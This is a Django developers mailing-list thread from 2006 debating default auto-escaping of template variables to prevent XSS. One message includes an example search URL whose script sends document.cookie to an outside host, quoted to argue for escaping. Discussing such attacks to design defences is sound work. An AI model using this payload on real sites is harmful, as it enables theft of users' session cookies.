Proposal: default escaping

SmileyChris

Jun 13, 2006, 6:49:15 PM
to Django developers
Here's how I see it:
- 99% of the time, templates are HTML
- most template variables should be escaped
- developers are human and will miss variables that need escaping

My proposal is that all template variables are escaped by default.


Think about it for a bit before you throw the idea away. Then reply
with your thoughts.


Of course we need an easy method to NOT auto-escape variables. Perhaps
something like {{{{ raw_variable }}}}?

There is also the issue of MASSIVE backwards incompatibility. The two
options I see are:
1. A new variable type is created for auto-escaping instead
2. Provide a setting which turns this new functionality on but is off
by default
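
To make the proposal concrete, here is a minimal sketch of escape-by-default rendering. It is not Django's template engine: the `render` function and its regular expression are hypothetical stand-ins, and the quadruple-brace syntax is only the tentative spelling floated above.

```python
import re
from html import escape

# Hypothetical mini-renderer, for illustration only (not Django's engine).
# {{{{ name }}}} inserts the value untouched; {{ name }} HTML-escapes it.
_VARIABLE = re.compile(r"\{\{\{\{\s*(\w+)\s*\}\}\}\}|\{\{\s*(\w+)\s*\}\}")


def render(source, context):
    def substitute(match):
        raw_name, escaped_name = match.groups()
        if raw_name is not None:
            return str(context.get(raw_name, ""))
        return escape(str(context.get(escaped_name, "")))

    return _VARIABLE.sub(substitute, source)


context = {"name": "<b>Bob</b>"}
print(render("<p>{{ name }}</p>", context))      # variable is escaped
print(render("<p>{{{{ name }}}}</p>", context))  # variable is passed through raw
```

With this arrangement a forgotten annotation fails safe: the worst outcome is visible markup on the page rather than injected markup.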

Rudolph

Jun 13, 2006, 7:07:27 PM
to Django developers
Hi,

Pro:
- secure by default: you cannot miss a variable, because you have to
explicitly disable escaping for it. I would prefer a slightly more
verbose syntax, like: {{ variable|noescape }}.

Con:
- explicit escaping is better than implicit escaping (no magic behind
the scenes)

I like your idea of explicitly turning it on or off globally in the
settings. In addition to that idea I would suggest an option to set the
behaviour for a whole Template, something like:

tmpl = loader.get_template('example.csv')
tmpl.auto_escape = False
tmpl.render(context)

You could also skip the idea of globally enabled escaping, and only do
it per template as described above. I'm not sure what I like the most.

Rudolph

Michael Radziej

Jun 14, 2006, 3:00:46 AM
to django-d...@googlegroups.com
Hi,

Some time ago, I wrote something in this direction, it's a Template
subclass that escapes all variable nodes. I found that I don't use
it, but perhaps someone wants to build upon it. It works, but misses
a proper loader.

If you have a pre-formatted string, you have to turn it into an
HtmlEscapedString when putting it into the Context.

It's attached.

Michael

htmltemplate.py

Simon Willison

Jun 14, 2006, 4:57:46 AM
to django-d...@googlegroups.com

On 14 Jun 2006, at 00:07, Rudolph wrote:

> I like your idea of explicitly turning it on or off globally in the
> settings. In addition to that idea I would suggest an option to set
> the
> behaviour for a whole Template, something like:
>
> tmpl = loader.get_template('example.csv')
> tmpl.auto_escape = False
> tmpl.render(context)

I'm not keen on either of those options. The template file itself is
the place where the assumption of escaping vs. not escaping matters.
Example: I write a template that expects auto escaping to be on:

<p>Hello, {{ name_from_form }}</p>

My assumption that escaping is turned on is built in to the template
file itself. If I hand it off to a friend and they deploy it
somewhere without realising that their settings file should have
AUTO_ESCAPE=True, they have an XSS hole. Alternatively, if they load
my template and set tmpl.auto_escape=False they have a hole as well.

Furthermore, setting auto escaping globally destroys all chances of
code reusability. What if I download a forum application from
somewhere and a poll application from somewhere else, and one of them
expects the global AUTO_ESCAPE option to be true while the other
expects it to be false? This is /exactly/ what happened with the
whole magic quotes thing in PHP and it made writing reusable PHP
components virtually impossible.

In my opinion, there are three viable solutions:

1. auto_escape is on for ALL Django templates ALL the time. It may
well be too late to do this due to backwards compatibility concerns.

2. auto_escape is controlled in the Django template file itself. The
above example might become something like this:

{% auto_escape_on %} <!-- global setting for this template -->
<p>Hello, {{ name_from_form }}</p>

Or maybe a block-style template tag:

{% autoescape %}
<p>Hello, {{ name_from_form }}</p>
{% endautoescape %}

While the second seems to fit better with previous template tags, I
actually prefer the first. It reminds me of Python's method for
stating that a .py source file is written in UTF-8:

# -*- coding: utf-8 -*-

3. Auto escape based on the file extension for the template -
"frontpage.html" gets auto escaped, "welcome_email.txt" doesn't. I'm
not sure how I feel about this option.

The ideal situation would be for auto_escape to be on by default, and
let templates turn it off if they need to. This has serious backwards
compatibility issues however.

Naturally, an "unescape" filter should be included so that even when
auto escaping is on you can still undo it on a per-variable basis if
you need to.
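
As a rough sketch of option 2, the escaping decision can travel with the template source itself. Everything here is an assumption made for illustration: the directive spelling follows the tentative tag name above, and `render` is a toy stand-in, not Django's loader or parser.

```python
import re
from html import escape

# Hypothetical directive handling; the tag names follow the spelling used in
# this thread and are not an existing Django feature.
_DIRECTIVE = re.compile(r"^\s*\{%\s*auto_escape_(on|off)\s*%\}\s*")
_VARIABLE = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render(source, context, default_escape=False):
    """Render `source`, letting a leading directive override the default."""
    auto_escape = default_escape
    match = _DIRECTIVE.match(source)
    if match:
        auto_escape = match.group(1) == "on"
        source = source[match.end():]  # drop the directive from the output

    def substitute(var):
        value = str(context.get(var.group(1), ""))
        return escape(value) if auto_escape else value

    return _VARIABLE.sub(substitute, source)


template = "{% auto_escape_on %}\n<p>Hello, {{ name_from_form }}</p>"
print(render(template, {"name_from_form": "<script>alert(1)</script>"}))
```

Because the directive lives in the file, handing the template to someone with different settings does not change how it escapes.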

Cheers,

Simon

Gábor Farkas

Jun 14, 2006, 5:48:32 AM
to django-d...@googlegroups.com
Simon Willison wrote:
>
>
> The ideal situation would be for auto_escape to be on by default, and
> let templates turn it off if they need to. This has serious backwards
> compatibility issues however.

the official opinion is that there's no backward-compatibility
guarantees before 1.0 anyway...

i understand that it would be nice not to break backward compatibility,
but escaping is imho such a serious issue, that imho it would make
sense, even if it causes backward-incompatibility.

and, if we'll have a template tag, like "{% auto_escape_off %}", then if
you do not want to break your older templates, simply add this line to
all of them, and everything will be like before. clean and simple.

gabor

Deryck Hodge

Jun 14, 2006, 8:26:33 AM
to django-d...@googlegroups.com
Hi, all. <imitates_radio>First time caller here.</imitates_radio>

On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
> In my opinion, there are three viable solutions:
>
> 1. auto_escape is on for ALL Django templates ALL the time. It may
> well be too late to do this due to backwards compatibility concerns.
>

Another concern about this option, rather than just backwards compatibility,
is that Django would be making assumptions about what I want to do with
my data. I don't agree with the assumption in the parent that "most template
variables should be escaped". Probably they should, but that's a debatable
point, not a fact.

One of the things I love about Django most, is that it doesn't make
assumptions about what I want to do, at least not assumptions of this kind.
It just gives me tools for doing what I want more efficiently.

> 2. auto_escape is controlled in the Django template file itself. The
> above example might become something like this:

I think this is better. Then it's still my choice, but I'm capable of
applying escaping more quickly and easily. It's about efficiency again. :-)

Cheers,
deryck

--
Deryck Hodge
http://www.devurandom.org/
http://www.samba.org/

"Aimless days, uncool ways of decathecting" --Mike Doughty (2005)

Derek Anderson

Jun 14, 2006, 9:44:47 AM
to django-d...@googlegroups.com
the problem is that there are multiple types of escaping. sql? html?
javascript? new-web-tech-of-the-day? do you escape them all, or just some?

personally, i don't like my framework to auto-munge my data behind my
back. esp. in ways that are not clearly defined and could change on a
whim. too many potential secondary effects. plus it stinks to me of a
false sense of security while implicitly OKing people to ignore security.

but if it is going to be done, i'd suggest a flag on the field in the
model. ("automunge-html":="true"?) with perhaps a model default.

Simon Willison

Jun 14, 2006, 10:20:29 AM
to django-d...@googlegroups.com
On 14 Jun 2006, at 14:44, Derek Anderson wrote:

> the problem is that there are multiple types of escaping. sql? html?
> javascript? new-web-tech-of-the-day? do you escape them all, or
> just some?
>
> personally, i don't like my framework to auto-munge my data behind my
> back. esp. in ways that are not clearly defined and could change on a
> whim. too many potential secondary effects. plus it stinks to me
> of a
> false sense of security while implicitly OKing people to ignore
> security.
>
> but if it is going to be done, i'd suggest a flag on the field in the
> model. ("automunge-html":="true"?) with perhaps a model default.

The model is definitely the wrong place for this - after all, a model
field might be output in a plain text email where escaping isn't
appropriate.

The problem here is very simple: XSS is the most common vulnerability
on the Web. It's unbelievably easy for an XSS vulnerability to sneak
in to an application - even experienced programmers who completely
understand the security implications are likely to forget to add a |
escape filter once in a while.

Obviously we DO need to be able to turn auto escaping off - there are
plenty of cases where it isn't appropriate. A classic example from
Django at the moment would be:

{{ value|markdown }}

We should also be able to turn it off for people who don't like it,
like yourself!

BUT... we can't have it as a global setting. magic quotes in PHP has
taught us that much - global settings relating to auto filtering of
data lead to insanity when you start wanting to create reusable
applications.

That's why I'm keen on having escaping set at the template level. I'm
actually starting to feel that using the template extension might not
be a bad idea here. "index.html" has auto escaping, "index.txt"
doesn't. That way templates don't have to include an ugly extra tag
at the top of the code.

Cheers,

Simon

Derek Anderson

Jun 14, 2006, 10:48:16 AM
to django-d...@googlegroups.com
the idea of it being in the model was more along the lines of validating
incoming data than it was munging outgoing. html is almost always
either acceptable or it's not in a given field. (per your example: who
wants arbitrary HTML allowed in a plain text email and not in a web
page?)

but i still argue that no implicit magic munging happen anywhere. it's
not that hard to get into safe-from-XSS coding styles. we did it for
sql injection, didn't we? :)

however, i would much rather have a flag/tag at the top of my template
than a global default based on template file type.

Deryck Hodge

Jun 14, 2006, 11:00:45 AM
to django-d...@googlegroups.com
On 6/14/06, Derek Anderson <pub...@kered.org> wrote:
>
> the idea of it being in the model was more along the lines of validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example: who
> wants arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging happen anywhere. it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)
>

I agree with Simon that if this should happen it shouldn't be at the
model level, but I'm really in agreement with Derek on the larger issue
here that this shouldn't be turned on by default. It smells to me of
a false sense of security.

And really, if it's done at the template level, you'll still have to decide
when to turn on/off, so why change the default? I just like the idea of
adding a {% autoescape %} or something similar much better.

Just my .02...

Simon Willison

Jun 14, 2006, 11:13:16 AM
to django-d...@googlegroups.com

On 14 Jun 2006, at 15:48, Derek Anderson wrote:

> the idea of it being in the model was more along the lines of
> validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example:
> who
> wants arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging happen anywhere.
> it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)

It's not just about data from models though. The absolutely classic
XSS example is the search feature that redisplays the query:

blah.com/search?q=django

You searched for {{ q }}:

{% for result in searchresults %}
...
{% endfor %}

blah.com/search?q=<script>window.location='http://hax.ru/?steal='+document.cookie</script>

XSS hole!
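
The difference escaping makes to that query can be seen with Python's standard `html.escape`. This is only a sketch of the effect; the string formatting below stands in for the template and is not how Django renders anything.

```python
from html import escape

# The malicious query string from the example above.
q = "<script>window.location='http://hax.ru/?steal='+document.cookie</script>"

unsafe = "You searched for %s:" % q          # markup reaches the browser intact
safe = "You searched for %s:" % escape(q)    # markup is rendered as inert text

print(unsafe)
print(safe)
```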

What do you think of auto escaping being on for .html templates and
off for .txt templates?

Cheers,

Simon

Michael Radziej

Jun 14, 2006, 11:19:56 AM
to django-d...@googlegroups.com
Hmm. I see two different cases that get munched in the discussion:

a) You run data through some filter or inside a html tag where it shouldn't be escaped.
For this, you (or the designer) need to specify this in the template.

b) Parts of the context are pre-assembled html or are already escaped. The designer can't
always know when this is the case.
To cope with this, I really like the approach of Ian Bicking's Quixote:
Everything that has already been escaped is packaged in a wrapper class,
so that you pass something like
HtmlEscaped('<a href="..">bla</a>')
into the context.
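
A minimal sketch of that wrapper idea, assuming a plain `str` subclass as the marker. The class name is taken from the example above; the `to_html` helper is hypothetical and only shows where the check would sit.

```python
from html import escape


class HtmlEscaped(str):
    """Marker type: a string the view author vouches for as ready-made HTML."""


def to_html(value):
    # Values already marked as escaped pass through; everything else is escaped.
    if isinstance(value, HtmlEscaped):
        return str(value)
    return escape(str(value))


context = {
    "link": HtmlEscaped('<a href="..">bla</a>'),  # pre-assembled markup
    "comment": '<a href="..">bla</a>',            # untrusted plain string
}
print(to_html(context["link"]))
print(to_html(context["comment"]))
```

The designer writes the same variable syntax in both cases; whoever builds the context decides which values are trusted.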

Michael

oggie rob

Jun 14, 2006, 12:19:20 PM
to Django developers
> What do you think of auto escaping being on for .html templates and off for .txt templates?

Simon,
Sounds clean but consider:
a) The ever-present argument about file extensions & template syntax
(that we seemed to solve with MR)
b) These can't be so easily extended. For example, to switch your
entire app from non-escaping to escaping you have to rename all your
files. If you set a variable in a base template, you can just add the
tag there.
So I think {% auto_escape_on %} or {% auto_escape_off %} are better
options (depending on consensus to which should be the default).

-rob

Simon Willison

Jun 14, 2006, 12:51:28 PM
to django-d...@googlegroups.com

On 14 Jun 2006, at 17:19, oggie rob wrote:

> a) The ever-present argument about file extensions & template syntax
> (that we seemed to solve with MR)
> b) These can't be so easily extended. For example, to switch your
> entire app from non-escaping to escaping you have to rename all your
> files. If you set a variable in a base template, you can just add the
> tag there.
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

You've got me convinced. In that case, my preference is probably for
auto escape to be on by default, and for it to be turn on-and-offable
with {% autoescape on %} and {% autoescape off %}.

Deryck Hodge

Jun 14, 2006, 1:02:51 PM
to django-d...@googlegroups.com
On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
>

My preference would be off by default with the same on-and-offable
tags listed here. I'd rather make the conscious choice to escape rather
than unescape. And you're still backwards compatible at that point.

But I can live with on by default, too. :-)

Rudolph

Jun 14, 2006, 1:48:54 PM
to Django developers
Hi,

Derek Anderson mentioned the need for different kinds of escaping. So
maybe the syntax should be more something like:

{% autoescape xml on %}

and

{% autoescape javascript on %}
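
To illustrate why one escaper does not fit every output context, here is the same value passed through three Python standard-library functions. Which function a given autoescape mode would actually use is an assumption, not something the proposal specifies.

```python
import json
from html import escape
from urllib.parse import quote

value = 'Tom & "Jerry" <cat>'

print(escape(value))           # HTML/XML text and attribute values
print(quote(value, safe=""))   # a single URL component
print(json.dumps(value))       # a JavaScript/JSON string literal
```

Each result is correct only in its own context, so the template has to say which one it wants.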

Rudolph

Jacob Kaplan-Moss

Jun 14, 2006, 3:08:11 PM
to django-d...@googlegroups.com
Hi folks --

So the benefits of automatic escaping are pretty obvious --
protection from XSS attacks -- but I'm wary of a few details in the
existing proposals.

First, escaping everything by default completely breaks every existing
template. That's not necessarily a complete deal-breaker, but I'm
pretty much -1 on the idea as it seems too radical.

I like the proposal by Simon (et al) for an {% autoescape on %} tag.
However, there are some semantics of the tag that are scary. Not
doing it as a block tag means that simply by calling the tag I've
switched the template language into a different system. That has non-
obvious implications when used with extension/inclusion. For example::

base.html:

{% autoescape on %}
{% block content %}{% endblock %}

child.html:

{% extends "base.html" %}
{% block content %}{{ var }}{% endblock %}

How does {{ var }} behave in the child template?

And for content brought in through {% include %}?

Sure, answers to these questions can be documented, but I still think
they'd be non-obvious. Because of that, I'm -0 on this concept
without further exploration.

Given that, I think the best idea is still using a block tag::

{% escape %}
{{ var }}
{% endescape %}

that just seems the most clear to me.
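
A toy sketch of the block form shows why its scope is easy to reason about: escaping applies only between the opening and closing tags of the file being read. The `render` function and its regular expressions are hypothetical and ignore nesting, inheritance and includes.

```python
import re
from html import escape

# Hypothetical block-tag handling, for illustration only.
_BLOCK = re.compile(r"\{%\s*escape\s*%\}(.*?)\{%\s*endescape\s*%\}", re.DOTALL)
_VARIABLE = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def _fill(source, context, transform):
    # Replace each {{ name }} with its (optionally transformed) value.
    return _VARIABLE.sub(
        lambda m: transform(str(context.get(m.group(1), ""))), source
    )


def render(source, context):
    # re.split with one capturing group alternates outside/inside segments,
    # so odd indexes hold the bodies of {% escape %} blocks.
    parts = _BLOCK.split(source)
    return "".join(
        _fill(part, context, escape if index % 2 else str)
        for index, part in enumerate(parts)
    )


template = "{{ var }} {% escape %}{{ var }}{% endescape %}"
print(render(template, {"var": "<em>hi</em>"}))
```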

Jacob

gabor

Jun 14, 2006, 4:04:29 PM
to django-d...@googlegroups.com
Jacob Kaplan-Moss wrote:
> Hi folks --
>
> So the benefits of automatic escaping are pretty obvious --
> protection from XSS attacks -- but I'm wary of a few details in the
> existing proposals.
>
> <snip/>

i completely agree that before doing such a global change, all
consequences will have to be examined/specified.


>
> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}
>
> that just seems the most clear to me.

maybe we could try to answer a question:

is it true, that people usually forget to escape dangerous variables?


a) if no (people do not forget):
means people are already using 'escape' when needed. in this case, this
block-level tag is a welcome addition, because it makes it
simpler/more-convenient to toggle escaping.


b) if yes (people do forget):
a block level tag will not help. people will forget to use them the same
way they forget to use the 'escape' filter.

my guess is (b)

gabor

SmileyChris

Jun 15, 2006, 12:19:33 AM
to Django developers
gabor wrote:
> my guess is (b)

I think (b) is pretty much a given. Looking back in the developers
group history, I see this is a recurring problem that seems to keep
getting put in the "too hard" basket.

See:
http://groups.google.com/group/django-users/browse_thread/thread/21da889ecb9c63dd/145e3e9c0e39b310
which references:
http://groups.google.com/group/django-users/browse_thread/thread/13cf8218d3a18aad/f4648b081c90885a
http://groups.google.com/group/django-developers/browse_thread/thread/e448bbdd40426915/2ee9766d0d148706

Gary Wilson

Jun 15, 2006, 1:55:44 PM
to Django developers
gabor wrote:
> is it true, that people usually forget to escape dangerous variables?
>
>
> a) if no (people do not forget):
> means people are already using 'escape' when needed. in this case, this
> block-level tag is a welcome addition, because it makes it
> simpler/more-convenient to toggle escaping.
>
>
> b) if yes (people do forget):
> a block level tag will not help. people will forget to use them the same
> way they forget to use the 'escape' filter.
>
> my guess is (b)

or

c) people don't know what XSS is and are clueless about the need to
escape. A good case for turning escaping on by default.


What would you rather have:
"Help, help! How do I turn off escaping?"
or
"Help, help! H4a0r s+0l3|> my Dj4|\|g0!!!!!!!!111"

James Bennett

Jun 15, 2006, 2:15:41 PM
to django-d...@googlegroups.com
On 6/15/06, Gary Wilson <gary....@gmail.com> wrote:
> What would you rather have:
> "Help, help! How do I turn off escaping?"

I don't know... memories are stirring of my PHP days and the horror of
magic_quotes...


--
"May the forces of evil become confused on the way to your house."
-- George Carlin

Norman Harman

Jun 15, 2006, 2:37:33 PM
to django-d...@googlegroups.com
For my ImageUploadFields I ignore the filename provided by the user and
name it something specific. I got real tired of the save_file
method appending underscores when it found a file with that name
already existed.

So, added this delete_fieldname_file(). Works like save_filename_file
but deletes any file named get_fieldname_file.

Maybe someone else likes it. It should be added to mr.

patch attached, I hope...

delme

Rowan Kerr

Jun 15, 2006, 6:44:04 PM
to django-d...@googlegroups.com
On 6/15/06, James Bennett <ubern...@gmail.com> wrote:
> I don't know... memories are stirring of my PHP days and the horror of
> magic_quotes...

As long as the data is only escaped on final output (and here escaping
should actually be intelligent as to whether it's outputting html, or
some mime-encoded email). magic_quotes mangled all your data no matter
where it was from or where it was going.
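
The distinction can be sketched as follows: the value is stored untouched, and each output format applies its own rule at the last moment. The two helper functions are hypothetical and exist only to show the contrast with escaping on input.

```python
from html import escape

stored_comment = "I <3 Django & Python"  # kept exactly as the user typed it


def as_html(text):
    # HTML output: escape at the point of rendering.
    return "<p>%s</p>" % escape(text)


def as_plain_text_email(text):
    # text/plain output: no HTML escaping is wanted here.
    return "New comment:\n%s\n" % text


print(as_html(stored_comment))
print(as_plain_text_email(stored_comment))
```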

-Rowan

Phil Powell

Jun 16, 2006, 9:17:14 AM
to django-d...@googlegroups.com
On 14/06/06, oggie rob <oz.rob...@gmail.com> wrote:
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

I'm kind of +1 for leaving it off by default - I'm not keen on data
getting munged behind my back.

And as for the argument that people will forget to use it - I have the
hard-line opinion of: tough, you should be more careful. If it
forcibly makes developers more aware of the possibilities of XSS et
al, then that can only be a good thing.

Just to throw something else into the mix: how about a HTMLField?

-Phil

Christopher Lenz

Jun 16, 2006, 12:17:35 PM
to django-d...@googlegroups.com
Am 14.06.2006 um 21:08 schrieb Jacob Kaplan-Moss:
[snip]

> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}

I feel this is inelegant and insufficient. Back when this topic was
raised last time, I chimed in with a reference to how we handle
HTML escaping in Trac:

http://groups.google.com/group/django-developers/browse_thread/thread/e448bbdd40426915/9962020f9699471c?q=lenz&rnum=8#9962020f9699471c

To reiterate: templates shouldn't need to care about escaping. Django
*in particular* uses an intentionally dumbed down template system
that is supposed to be easy for non-programmers, which includes the
notion that little mistakes in templates shouldn't break the site or
even introduce security holes.

IMHO, a real solution for this problem is that any normal string
inserted into template output is escaped by default. This does not
necessarily mean that there needs to be an unescape filter, though.
In fact, most of the time, Django components that generate a string
*know* that they are generating text that must not be escaped,
such as the output of the markdown filter, or form field render()
results. Those places should flag the strings they are generating in
some way (for example by wrapping them in a special class), thereby
signaling to the template system that those strings should not be
escaped again.

Now, I'll admit that the Django template engine being output-type
agnostic is a problem in this context. But then again, I'm not happy
with Django templating in general, so I'll just shut up now :-P

Cheers,
Chris
--
Christopher Lenz
cmlenz at gmx.de
http://www.cmlenz.net/

SmileyChris

Jun 18, 2006, 12:54:22 AM
to Django developers
Brilliant, Christopher. This is exactly the solution I'd be pleased
with!

We still have the problem of invalidating every single template written
so far in Django, however...

James Bennett

Jun 18, 2006, 2:54:25 AM
to django-d...@googlegroups.com
On 6/16/06, Christopher Lenz <cml...@gmx.de> wrote:
> To reiterate: templates shouldn't need to care about escaping. Django
> *in particular* uses an intentionally dumbed down template system
> that is supposed to be easy for non-programmers, which includes the
> notion that little mistakes in templates shouldn't break the site or
> even introduce security holes.

The problem here, architecture-wise, is that the template is the thing
that cares about what output looks like. Moving the decision of
whether to escape or not into some other part of the stack breaks with
that and introduces the possibility of frustrating inconsistency in
the templating system; explaining to a template author why {{ foo }}
escapes in one case but not another, based on (to the template author)
black magic happening in the backend isn't something I particularly
want to do.


> IMHO, a real solution for this problem is that any normal string
> inserted into template output is escaped by default. This does not
> necessarily mean that there needs to be an unescape filter, though.

Yes. Yes, it does.

> In fact, most of the time, Django components that generate a string
> *know* that they are generating text that must not be escaped,
> such as the output of the markdown filter, or form field render()
> results. Those places should flag the strings they are generating in
> some way (for example by wrapping them in a special class), thereby
> signaling to the template system that those strings should not be
> escaped again.

As someone who's followed various RSS-related discussions for a long
time, I can say that having multiple layers of a system have to worry
about whether the other layers have escaped or unescaped something is
a very special kind of hell that I don't want Django to get mired in.

But beyond that, it feels like a violation of loose coupling; doing
this would bind Django components to each other in ways that don't
feel right.

My vote is for escaping being off unless explicitly turned on, and for
it being turned on in the template.

pub...@kered.org

Jun 19, 2006, 3:18:13 PM
to django-d...@googlegroups.com
To better detail the "in the model" idea:

An additional field type would be added, extending CharField, called say
"HTMLSafeField". It would strip/escape/convert/reject invalid strings
both when being set and when being read. Otherwise it would behave just
like a CharField.
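
As a rough sketch of the "reject" variant only, such a field could run a check like the one below before accepting a value. Both names are hypothetical: `validate_html_safe` is not a Django validator, and `ValidationError` here is a local stand-in class.

```python
import re

# Characters that can start markup or entities in HTML.
_MARKUP = re.compile(r"[<>&]")


class ValidationError(ValueError):
    """Stand-in for a framework validation error (hypothetical)."""


def validate_html_safe(value):
    # Reject rather than rewrite: an accepted value is guaranteed markup-free.
    if _MARKUP.search(value):
        raise ValidationError("HTML markup characters are not allowed here.")
    return value


print(validate_html_safe("plain text is fine"))
```

Note that this strict version also refuses harmless input such as "Tom & Jerry", which is the cost of validating instead of escaping.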

The key is not to think of it as an escaping mechanism; simply as a data
validity check. And there is ample precedent for this in Django. What
are EmailFields, PhoneNumberFields and SlugFields if not simply CharFields
that match a regex?

"Intro" users who are not able to grok XSS can simply be told to always
use HTMLSafeFields instead of CharFields. Converting existing apps would
be simple model-only search-and-replace exercises. Folks who don't like
wrapper tags around all variables in templates will be appeased. (as will
those who don't want "escape=on" tags at the top of every template) And I
(and my like-minded kin) who think both "breaking every template==bad" and
"magic behind the scenes==worse" will not vomit at the addition.

Likewise XMLSafeField, JavascriptSafeField, MustMatchUserRegexField, etc.
would be logical extensions.

The biggest downside is if you want valid HTML data stored for one output
type and escaped for another. But this is not a scenario I've ever seen
in the real world, and regardless is easily worked around with simply
returning to CharFields for that one attribute. (and manually escaping of
course)

What do you think?

-- Derek

Simon Willison

Jun 19, 2006, 3:37:28 PM
to django-d...@googlegroups.com

On 19 Jun 2006, at 20:18, pub...@kered.org wrote:

> The biggest downside is if you want valid HTML data stored for one
> output
> type and escaped for another. But this is not a scenario I've ever
> seen
> in the real world, and regardless is easily worked around with simply
> returning to CharFields for that one attribute. (and manually
> escaping of
> course)
>
> What do you think?

I'm not keen on escaping being controlled by the model - escaping
should be a template-level decision as that's when you decide what
format is being output (plain text email / HTML / XML / LaTeX for PDF
conversion etc).

I played around with some proofs of concept over the weekend and I
think I have some ideas that should keep most people happy. I'll try
to write them up on the wiki this evening.

Cheers,

Simon

pub...@kered.org

Jun 19, 2006, 4:00:57 PM
to django-d...@googlegroups.com
> I'm not keen on escaping being controlled by the model - escaping
> should be a template-level decision as that's when you decide what
> format is being output (plain text email / HTML / XML / LaTeX for PDF
> conversion etc).
>
> I played around with some proofs of concept over the weekend and I
> think I have some ideas that should keep most people happy. I'll try
> to write them up on the wiki this evening.

that's why i suggest looking at this as a data validation issue. (not
simply as escaping) we do lots of validation in the model already. (some
argue that *all* data validation should be in the model) this would just
be an additional type.

anyway, i suppose i will wait for you to elaborate on your reasoning in
the wiki this evening. :)

SmileyChris

Jun 19, 2006, 11:42:39 PM
to Django developers
pub...@kered.org wrote:

> that's why i suggest looking at this as a data validation issue. (not
> simply as escaping) we do lots of validation in the model already.

But it is an escaping issue.
There's nothing wrong with allowing html to be entered in (for example)
a comment field. It should be escaped in most templates, but sometimes
not, for example if there was a plain-text email of comments that gets
sent.

Simon Willison

Jun 20, 2006, 2:50:41 AM
to django-d...@googlegroups.com

On 19 Jun 2006, at 21:00, pub...@kered.org wrote:

> anyway, i suppose i will wait for you to elaborate on your
> reasoning in
> the wiki this evening. :)

I've written up a proposal for how we can implement auto escaping
while hopefully keeping most people happy:

http://code.djangoproject.com/wiki/AutoEscaping

It incorporates stuff from a whole bunch of prior discussions. In my
opinion the most important aspect is the use of special escapedstr
and escapedunicode subclasses to mark a string as having been already
escaped, meaning that the auto escaping mechanism knows if it should
kick in to action or not. This should also avoid double escaping, and
allow a decent level of finely grained control over the escaping
mechanism.
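
The double-escaping point can be sketched like this. Only the `escapedstr` name comes from the proposal; the `auto_escape` helper is a hypothetical illustration and may not match what the wiki page specifies.

```python
from html import escape


class escapedstr(str):
    """A str subclass marking text as already escaped (name taken from the post)."""


def auto_escape(value):
    # Hypothetical helper: escape once, and tag the result so that a second
    # pass through the same function leaves it alone.
    if isinstance(value, escapedstr):
        return value
    return escapedstr(escape(str(value)))


once = auto_escape("Fish & <chips>")
twice = auto_escape(once)
print(once)           # Fish &amp; &lt;chips&gt;
print(twice == once)  # True
```

A filter that produces HTML on purpose would return an `escapedstr` directly, and the same check would then leave its output untouched.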

I'd like to get a branch going to explore this stuff properly. From
messing around with my own local code it seems like it should all
work, but there's a bunch of work that needs to be done to make
existing Django filters and templates auto escape compliant.

Cheers,

Simon

Michael Radziej

Jun 20, 2006, 4:34:45 AM
to django-d...@googlegroups.com
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

GoodStuff! (tm)

Michael

adurdin

Jun 20, 2006, 5:50:07 AM
to Django developers
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

A very nice solution, with a good method of automatically flagging
things as escaped or not; but it seems to me more complicated than is
needed. And, of course there's more than just html escaping needed;
URLs should be escaped differently, and other values intended to be
used as attributes also need a different escape filter -- I'm not sure
your proposal will allow these to be handled correctly and
conveniently. So here's another idea to throw into the soup:

Having the context aware of the primary escaping needs of the output is
a nice idea, but as James Bennett pointed out, the template is what
should be making the decision. Suppose the template renderer had a
"default filter" that would get applied to all otherwise unfiltered
output? Obviously, the default value for this would be
django.template.defaultfilters.escape -- but it could be set to
another filter for JSON output, or to None for plain text. One
possible mechanism for doing this would be a {% default_filter ... %}
tag in the template...?

Assuming the default, then {{name}} would be the equivalent of
{{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
unchanged, and a new filter "raw" (just a pass-thru) could be used for
situations like <script>{{myscript|raw}}</script>.

The main drawback I see with this is that the behaviour of
{{mylist|count}} is not obviously unescaped. Perhaps having all output
piped through the default filter unless it is piped through the "raw"
filter (which could perhaps be handled using Michael's escaped
strings)?
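
The "default filter" idea above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: `render_variable`, `raw` and the `default_filter` parameter are hypothetical names, not Django's API, and `html.escape` from the standard library stands in for the escape filter.

```python
from html import escape


def raw(value):
    """Hypothetical pass-through filter: explicitly opts out of escaping."""
    return value


def render_variable(value, filters=(), default_filter=escape):
    """Apply the listed filters; use default_filter only when none are given."""
    if not filters:
        text = str(value)
        return text if default_filter is None else default_filter(text)
    for f in filters:
        value = f(value)
    return str(value)


print(render_variable("<b>Tom & Jerry</b>"))         # like {{ name }}
print(render_variable("<b>Tom & Jerry</b>", [raw]))  # like {{ name|raw }}
print(render_variable([1, 2, 3], [len]))             # like {{ mylist|length }}
print(render_variable("<b>", default_filter=None))   # plain-text template
```

Note that in this sketch any explicit filter, not just `raw`, suppresses the default filter, which is exactly the drawback described for {{mylist|length}}.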

Andrew

adurdin

Jun 20, 2006, 6:05:00 AM6/20/06
to Django developers
adurdin wrote:
>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped.

I meant {{mylist|length}}, of course.

Todd O'Bryan

Jun 20, 2006, 7:02:33 AM6/20/06
